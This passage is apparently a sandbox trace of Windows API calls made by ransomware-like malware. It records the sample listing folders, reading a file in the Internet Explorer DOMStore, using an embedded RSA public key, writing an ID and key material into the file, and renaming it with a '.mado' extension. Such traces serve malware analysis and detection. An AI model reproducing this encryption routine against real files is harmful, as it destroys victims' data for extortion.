ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292de0 | out: hHeap=0x2c0000) returned 1 [0207.217] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.217] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="all", cAlternateFileName="")) returned 1 [0207.217] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brt", cAlternateFileName="")) returned 1 [0207.217] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brz", cAlternateFileName="")) returned 1 [0207.217] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dan", cAlternateFileName="")) returned 1 [0207.217] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dut", cAlternateFileName="")) returned 1 [0207.217] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eng", cAlternateFileName="")) returned 1 [0207.217] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="frn", cAlternateFileName="")) returned 1 [0207.217] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="grm", cAlternateFileName="")) returned 1 [0207.217] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="itl", cAlternateFileName="")) returned 1 [0207.217] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nrw", cAlternateFileName="")) returned 1 [0207.217] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="prt", cAlternateFileName="")) returned 1 [0207.217] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="spn", cAlternateFileName="")) returned 1 [0207.218] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 1 [0207.218] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 0 [0207.218] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b875b0 | out: hHeap=0x2c0000) returned 1 [0207.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292f90 | out: hHeap=0x2c0000) returned 1 [0207.218] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.218] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.219] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\") returned="36USA68T\\" [0207.219] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0207.219] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0207.219] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0207.219] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.219] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.219] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.219] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.219] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.219] PathFindFileNameW (pszPath="") returned="" [0207.219] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.220] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.220] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b05050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imagesrv.adition[1].xml", cAlternateFileName="IMAGES~1.XML")) returned 1 [0207.220] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned=".xml" [0207.220] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0207.220] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=13) returned 1 [0207.220] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0207.223] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0207.223] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xd, lpOverlapped=0x0) returned 1 [0207.223] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.224] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.224] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.224] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321738) returned 1 [0207.224] CryptCreateHash (in: hProv=0x321738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0207.224] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0207.224] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0207.224] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0207.225] GetLastError () returned 0x0 [0207.225] CryptDestroyHash (hHash=0x32ef238) returned 1 [0207.225] CryptReleaseContext (hProv=0x321738, dwFlags=0x0) returned 1 [0207.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0207.225] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0207.225] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0207.225] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0207.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.225] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0207.225] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.225] WriteFile (in: hFile=0x63c, lpBuffer=0x3b817b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b817b0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0207.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b817b0 | out: hHeap=0x2c0000) returned 1 [0207.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0207.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0207.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0207.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0207.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0207.226] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0207.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0207.226] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0207.226] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0207.226] CloseHandle (hObject=0x63c) returned 1 [0207.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf0) returned 0x32b69d8 [0207.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x900) returned 0x3b7b950 [0207.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0207.227] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml.mado")) returned 1 [0207.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.229] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0207.230] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b05050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imagesrv.adition[1].xml", cAlternateFileName="IMAGES~1.XML")) returned 0 [0207.230] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d65b8 | out: hHeap=0x2c0000) returned 1 [0207.231] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d65b8 [0207.231] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0207.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 